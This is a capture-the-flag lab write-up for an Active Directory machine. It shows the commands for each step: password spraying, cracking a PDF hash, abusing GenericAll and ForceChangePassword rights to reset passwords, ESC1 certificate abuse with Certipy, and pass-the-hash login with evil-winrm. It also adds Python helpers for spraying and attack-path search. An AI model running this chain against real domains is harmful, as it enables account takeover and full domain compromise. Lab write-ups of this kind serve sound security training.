Hacksmarter: Welcome (Easy)

·5 mins·
Arbaaz Jamadar

Objective:

You are a member of the Hack Smarter Red Team. During a phishing engagement you retrieved credentials for the client’s Active Directory environment. Use these credentials to enumerate the environment, elevate your privileges, and demonstrate impact for the client.

Credentials obtained from Phishing:

e.hills:Il0vemyj0b2025!

Summary:

We began with credentials harvested via phishing and used them to fully compromise the Active Directory domain. Starting from the user e.hills, we mapped SMB shares and domain objects and collected account relationships with BloodHound. A password-protected PDF on an HR share revealed the onboarding password for new hires, which a.harris was still using. a.harris is a member of hr@welcome.local, which holds GenericAll over i.park, so we reset i.park’s password; i.park in turn belongs to a helpdesk group with ForceChangePassword over svc_ca, a service account able to enroll certificates. Enumerating AD CS as svc_ca revealed a template vulnerable to ESC1; we requested a certificate carrying the Administrator’s UPN, authenticated with it to obtain the Administrator’s NT hash, and logged in to the domain controller over WinRM with pass-the-hash, completing full domain escalation from a single phished login.


Domain Controller:

  1. From our Nmap scan we identify the domain name as WELCOME.local and the Windows host name as DC01. The host exposes DNS on 53, Kerberos on 88, LDAP on 389, LDAPS on 636, SMB on 139 and 445 (SMB2 message signing required), and RDP on 3389, which is the service set of a domain controller:
    nmap.png
    nmapserv.png

SMB Shares:

  1. We can verify the harvested credentials by authenticating to SMB with NetExec:
    nxc smb 10.1.126.204 -u e.hills -p 'Il0vemyj0b2025!'
    
  2. The credentials are valid, so we can use them to enumerate the SMB shares:
    nxc smb 10.1.126.204 -u e.hills -p 'Il0vemyj0b2025!' --shares
    
    smb-enum.png
  3. We have READ access to an interesting share, Human Resources.
  4. Using smbclient we can connect to the share and retrieve all of its files (the doubled backslashes are shell escaping for the UNC path):
    smbclient \\\\10.1.126.204\\"Human Resources" -U e.hills
    
    sharemap.png

JohnTheRipper:

  1. The PDFs contain generic onboarding information, but Welcome Start Guide.pdf is password protected. We can brute-force the password by extracting a hash with pdf2john and cracking it with John the Ripper:
    #create hash
    pdf2john Welcome\ Start\ Guide.pdf > pdf.hash
    #crack the hash
    john pdf.hash --wordlist=/usr/share/wordlists/rockyou.txt
    
    hash.png
    hashcrack.png
  2. The PDF password is humanresources. Inside, the guide states the initial password set for new employee accounts.
  3. The password for new employee accounts is Welcome2025!@, so any account whose owner never changed it is a candidate.

Enumerating Users:

  1. We can dump all domain objects, relationships, policies and users with bloodhound-python or ldapdomaindump. I prefer ldapdomaindump to collect usernames and initial information, and BloodHound afterwards when I need to analyse relationships:
    ldapdomaindump -u welcome.local\\e.hills -p 'Il0vemyj0b2025!' -n 10.1.126.204 -m welcome.local
    
    ldapdump.png
    ldapdumpanalysis.png
  2. We build a list of usernames from the domain dump and spray it with the passwords collected so far to find which accounts still use them. Check the lockout threshold in the dumped domain policy first so the spray does not lock accounts out.
  3. Use NetExec to spray, where users is the username file and password is the password file (add --continue-on-success if you want nxc to keep going after the first hit):
    nxc smb 10.1.78.166 -u users -p password
    
    verify.png
  4. We found valid credentials: a.harris:Welcome2025!@
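
The user-list step above, as an added Python example that is not part of the original writeup: it reads ldapdomaindump's domain_users.json, drops disabled accounts, writes the users file that the nxc spray consumes, and reads lockoutThreshold from domain_policy.json so you know how many passwords you can try per account before a lockout. The JSON layout (a list of objects with dn and attributes, every attribute value wrapped in a list) is an assumption about the tool's output; the sample data is constructed, with account names taken from this writeup plus the built-in Guest.

```python
import json
from pathlib import Path

# userAccountControl bit for ACCOUNTDISABLE (Microsoft-documented value).
UF_ACCOUNTDISABLE = 0x0002

# Constructed sample in the layout ldapdomaindump is assumed to write to
# domain_users.json: a list of objects with "dn" and "attributes", every
# attribute value wrapped in a list. Account names come from this writeup plus
# the built-in Guest; the DNs and UAC values are made up for the example.
SAMPLE_USERS_JSON = json.dumps([
    {"dn": "CN=e.hills,CN=Users,DC=welcome,DC=local",
     "attributes": {"sAMAccountName": ["e.hills"], "userAccountControl": [512]}},
    {"dn": "CN=a.harris,CN=Users,DC=welcome,DC=local",
     "attributes": {"sAMAccountName": ["a.harris"], "userAccountControl": [66048]}},
    {"dn": "CN=i.park,CN=Users,DC=welcome,DC=local",
     "attributes": {"sAMAccountName": ["i.park"], "userAccountControl": [512]}},
    {"dn": "CN=Guest,CN=Users,DC=welcome,DC=local",
     "attributes": {"sAMAccountName": ["Guest"], "userAccountControl": [66082]}},
])

# Constructed domain_policy.json samples (same assumed layout). lockoutThreshold
# is the number of bad passwords before lockout; 0 means lockout is disabled.
SAMPLE_POLICY_JSON = json.dumps([
    {"dn": "DC=welcome,DC=local", "attributes": {"lockoutThreshold": [5]}},
])
NO_LOCKOUT_POLICY_JSON = json.dumps([
    {"dn": "DC=welcome,DC=local", "attributes": {"lockoutThreshold": [0]}},
])


def parse_users(dump_text):
    """Return [(sAMAccountName, is_disabled), ...] from domain_users.json text."""
    users = []
    for rec in json.loads(dump_text):
        attrs = rec.get("attributes", {})
        sam = (attrs.get("sAMAccountName") or [None])[0]
        uac = int((attrs.get("userAccountControl") or [0])[0])
        if sam:
            users.append((sam, bool(uac & UF_ACCOUNTDISABLE)))
    return users


def spray_candidates(dump_text):
    """Enabled accounts only, sorted and de-duplicated. Disabled accounts cannot
    log on, so spraying them only produces noise and failed-logon events."""
    return sorted({sam for sam, disabled in parse_users(dump_text) if not disabled})


def safe_attempts(policy_text):
    """Passwords you can try per account inside one observation window without
    locking it out: one less than lockoutThreshold. None when lockout is off."""
    attrs = json.loads(policy_text)[0].get("attributes", {})
    threshold = int((attrs.get("lockoutThreshold") or [0])[0])
    return None if threshold == 0 else threshold - 1


def write_users_file(users_json_path, out_path="users"):
    """Write the `users` file consumed by `nxc smb <dc> -u users -p password`."""
    names = spray_candidates(Path(users_json_path).read_text())
    Path(out_path).write_text("\n".join(names) + "\n")
    return names


if __name__ == "__main__":
    print("candidates:", spray_candidates(SAMPLE_USERS_JSON))
    print("safe attempts per window:", safe_attempts(SAMPLE_POLICY_JSON))
```

On a live dump, call write_users_file("domain_users.json") in the directory where ldapdomaindump wrote its output; with the sample data the three enabled accounts are kept and Guest is dropped, and a threshold of 5 leaves you four tries per account per window.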

BloodHound:

  1. Enumerating SMB as a.harris turned up nothing new, so now it is time to check relationships and see whether we can pivot and escalate our privileges.
  2. Dump relationships and objects using bloodhound-python:
    bloodhound-python -d welcome.local -u a.harris -p 'Welcome2025!@' -c all -ns 10.1.78.166
    
    bloodhounddump.png
  3. Import the dump into BloodHound and inspect the relationships attached to a.harris: the group a.harris belongs to (hr@welcome.local) has GenericAll over i.park.
    relations.png
  4. GenericAll over a user includes the right to reset its password, so we can set a new password for i.park with net rpc. Note that net rpc prints nothing on success; it only prints output when an error occurs. On a real engagement a forced reset locks the legitimate user out, so record it for the client:
    net rpc password 'i.park' 'Welcome2025!@' -U 'welcome.local'/'a.harris'%'Welcome2025!@' -S 10.1.78.166
    
    resetvuln.png
  5. We can verify the password change for i.park using nxc:
    nxc smb 10.1.78.166 -u 'i.park' -p 'Welcome2025!@'
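
The transitive-membership lookup that BloodHound performs when it shows a.harris reaching i.park through a group, written out as an added Python example (not from the original post or from BloodHound): a breadth-first search over a constructed edge list that mirrors the relationships reported in this writeup, including the helpdesk and svc_ca edges described in the next section. MemberOf edges are traversed for free because rights granted to a group are inherited by its members; takeover edges each cost a password reset. The edge list and names are constructed, and accounts_to_reset lists the credentials you would have to change, in order, to walk the path.

```python
from collections import deque

# Edge kinds whose holder can take over a user's credentials. GenericAll and
# ForceChangePassword are the two this writeup uses; the rest are the other
# BloodHound edges that end in control of the target object.
TAKEOVER_EDGES = {"GenericAll", "ForceChangePassword", "GenericWrite",
                  "WriteDacl", "WriteOwner", "AllExtendedRights", "Owns"}

# Constructed (source, edge, target) list mirroring what this writeup reports.
# Names use BloodHound's NAME@DOMAIN form; this is not a real BloodHound export.
EDGES = [
    ("A.HARRIS@WELCOME.LOCAL", "MemberOf", "HR@WELCOME.LOCAL"),
    ("HR@WELCOME.LOCAL", "GenericAll", "I.PARK@WELCOME.LOCAL"),
    ("I.PARK@WELCOME.LOCAL", "MemberOf", "HELPDESK@WELCOME.LOCAL"),
    ("HELPDESK@WELCOME.LOCAL", "ForceChangePassword", "SVC_CA@WELCOME.LOCAL"),
    ("HELPDESK@WELCOME.LOCAL", "ForceChangePassword", "SVC_WEB@WELCOME.LOCAL"),
]


def build_graph(edges):
    """Adjacency list: node -> [(edge_kind, target), ...], names upper-cased."""
    adj = {}
    for src, kind, dst in edges:
        adj.setdefault(src.upper(), []).append((kind, dst.upper()))
    return adj


def shortest_path(edges, start, goal):
    """BFS from start to goal. MemberOf is traversed for free (a group's rights
    are inherited by its members); takeover edges each cost a password reset.
    Returns the path as a list of (source, edge, target) or None if unreachable."""
    adj = build_graph(edges)
    start, goal = start.upper(), goal.upper()
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for kind, nxt in adj.get(node, []):
            if kind != "MemberOf" and kind not in TAKEOVER_EDGES:
                continue  # not an edge we know how to act on
            if nxt not in prev:
                prev[nxt] = (node, kind)
                queue.append(nxt)
    if goal not in prev:
        return None
    path, cur = [], goal
    while prev[cur] is not None:
        node, kind = prev[cur]
        path.append((node, kind, cur))
        cur = node
    return path[::-1]


def accounts_to_reset(path):
    """The accounts whose passwords must be changed, in order, to walk the path."""
    return [dst for _, kind, dst in path if kind in TAKEOVER_EDGES]


if __name__ == "__main__":
    route = shortest_path(EDGES, "a.harris@welcome.local", "svc_ca@welcome.local")
    for src, kind, dst in route:
        print(f"{src} -[{kind}]-> {dst}")
    print("reset in order:", accounts_to_reset(route))
```

From a.harris the search returns the four-hop route through hr and helpdesk and reports that i.park and then svc_ca must be reset; from e.hills, who holds no such rights in the constructed data, it returns None, which is the same answer BloodHound gives when no path exists.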
    

Administrator:

  1. While checking transitive memberships for a.harris, we noticed that i.park is a member of the helpdesk group, which has ForceChangePassword over svc_ca and svc_web, and that a.harris is also a member of Certificate Service DCOM Access. That indicates Certificate Services (AD CS) is enabled in the domain.

    forcereset.png

  2. We can confirm AD CS with the nxc adcs module:

    nxc ldap 10.1.78.166 -u 'i.park' -p 'Welcome2025!@' -M adcs
    

    adcs.png

  3. We can use Certipy to enumerate certificate templates that can be abused to escalate privileges, first as a.harris and then as i.park:

    certipy find -u a.harris -p 'Welcome2025!@' -dc-ip 10.1.78.166 -vulnerable
      certipy find -u i.park -p 'Welcome2025!@' -dc-ip 10.1.78.166 -vulnerable
    

    certipy.png

  4. Neither i.park nor a.harris can be used to escalate privileges through a template, but the user svc_ca is intriguing; the name suggests a service account for the Certificate Authority.

  5. Since helpdesk has ForceChangePassword over svc_ca, we can forcibly reset its password with net rpc and repeat the search for a vulnerable certificate template as svc_ca.

    1. I came to this conclusion after a whole lot of enumeration as a.harris and i.park; neither of them had anything interesting on their desktops.
  6. Command to change the password for svc_ca:

    	net rpc password 'svc_ca' 'Welcome2025!@' -U 'welcome.local'/'i.park'%'Welcome2025!@' -S 10.1.78.166
    

    certipy.png

  7. Running certipy find as svc_ca shows that the template Welcome-Template is abusable via ESC1: it lets the enrollee supply the subject alternative name, permits client authentication, requires no manager approval, and svc_ca has enrollment rights on it. The Certipy wiki has a step-by-step guide to privilege escalation with ESC1.

  8. Following the ESC1 abuse, we request a certificate as svc_ca with the Administrator’s UPN (and SID, so the certificate satisfies strong certificate mapping) in the SAN:

    certipy req \
    -u 'svc_ca@welcome.local' -p 'Welcome2025!@' \
    -dc-ip '10.1.78.166' -target 'DC01.WELCOME.LOCAL' \
    -ca 'WELCOME-CA' -template 'Welcome-Template' \
    -upn 'administrator@welcome.local' -sid 'S-1-5-21-141921413-1529318470-1830575104-500'
    
    1. You can find the SID in BloodHound: search for Administrator and read it from the node info:
      sid.png
    2. Run the command above to obtain administrator.pfx:
      admin-hash.png
  9. Use the certificate to authenticate with PKINIT and retrieve the Administrator’s NT hash (certipy also saves a TGT in a .ccache file). The hash can be used directly for pass-the-hash or cracked offline with john:

    certipy auth -pfx 'administrator.pfx' -dc-ip '10.1.78.166'
    

    get-hash.png
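
The conditions certipy find tests for ESC1, as an added Python example (not the page's or Certipy's own code): a checker that evaluates a template description against the six ESC1 requirements and reports which of them fail. The template dictionaries are constructed; only the name Welcome-Template comes from the writeup, and its attribute values are assumed so that the check fires, since the real settings appear only in the screenshot. Evaluated with svc_ca as the controlled principal the template is flagged; evaluated with no controlled principal it is not, which matches why the earlier runs as a.harris and i.park showed nothing. Clearing CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, the usual remediation, makes the same template pass.

```python
# Flag bits and OIDs from Microsoft's certificate-template documentation.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag (manager approval)

# EKUs that make a certificate usable for domain authentication.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "2.5.29.37.0",              # Any Purpose
}

# Well-known groups that make enrollment "low privileged" regardless of who we are.
LOW_PRIV_PRINCIPALS = {"DOMAIN USERS", "AUTHENTICATED USERS", "EVERYONE", "DOMAIN COMPUTERS"}

SVC_CA = "WELCOME.LOCAL\\svc_ca"

# Constructed template descriptions. Only the name comes from the writeup; the
# attribute values are assumed so the check fires (the real ones are only in the
# screenshot). Keys are a simplified view of the LDAP attributes certipy reads.
VULNERABLE_TEMPLATE = {
    "name": "Welcome-Template",
    "enabled": True,                      # published on a CA
    "enrollment_rights": [SVC_CA],        # principals holding Enroll
    "certificate_name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "enrollment_flag": 0,
    "ra_signatures": 0,                   # msPKI-RA-Signature
    "ekus": ["1.3.6.1.5.5.7.3.2"],
}
# The usual fix: build the subject from AD instead of letting the requester supply it.
HARDENED_TEMPLATE = {**VULNERABLE_TEMPLATE, "certificate_name_flag": 0}


def esc1_checks(tpl, controlled_principals=frozenset()):
    """Evaluate every ESC1 requirement for `tpl`. `controlled_principals` are the
    accounts/groups we hold credentials for; all six must be True to abuse ESC1."""
    enrollers = {p.upper() for p in tpl["enrollment_rights"]}
    ours = LOW_PRIV_PRINCIPALS | {p.upper() for p in controlled_principals}
    ekus = set(tpl["ekus"])
    return {
        "published_on_ca": bool(tpl["enabled"]),
        "enrollable_by_us": bool(enrollers & ours),
        "enrollee_supplies_subject": bool(tpl["certificate_name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "client_auth_eku": not ekus or bool(ekus & CLIENT_AUTH_EKUS),  # empty EKU = any purpose
        "no_manager_approval": not (tpl["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": tpl["ra_signatures"] == 0,
    }


def is_esc1(tpl, controlled_principals=frozenset()):
    return all(esc1_checks(tpl, controlled_principals).values())


def failed_checks(tpl, controlled_principals=frozenset()):
    """Which ESC1 requirements do not hold (an empty list means abusable)."""
    return [name for name, ok in esc1_checks(tpl, controlled_principals).items() if not ok]


if __name__ == "__main__":
    print("as nobody:", failed_checks(VULNERABLE_TEMPLATE))
    print("as svc_ca:", failed_checks(VULNERABLE_TEMPLATE, {SVC_CA}))
    print("hardened, as svc_ca:", failed_checks(HARDENED_TEMPLATE, {SVC_CA}))
```

Note that the enrollment-rights check is what separates the a.harris and i.park runs from the svc_ca run: the other five conditions are properties of the template alone, so once you hold any principal listed in its Enroll ACE the finding appears.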

Flags:

  1. Use evil-winrm to log in remotely over WinRM and retrieve the flags:
    1. user.txt
      evil-winrm -u a.harris -p 'Welcome2025!@' -i 10.1.78.166
      
      user.txt.png
    2. root.txt
        evil-winrm -u administrator -H '0cf1b799460a39c852068b7c0574677a' -i 10.1.78.166
      
      root.txt.png

Note:

  1. Use RustScan to reliably enumerate ports in an AD environment; Nmap sometimes produces false negatives.
  2. During enumeration with RustScan I found that port 5985 (WinRM) is open, which is what allows the remote login to the domain controller with evil-winrm.
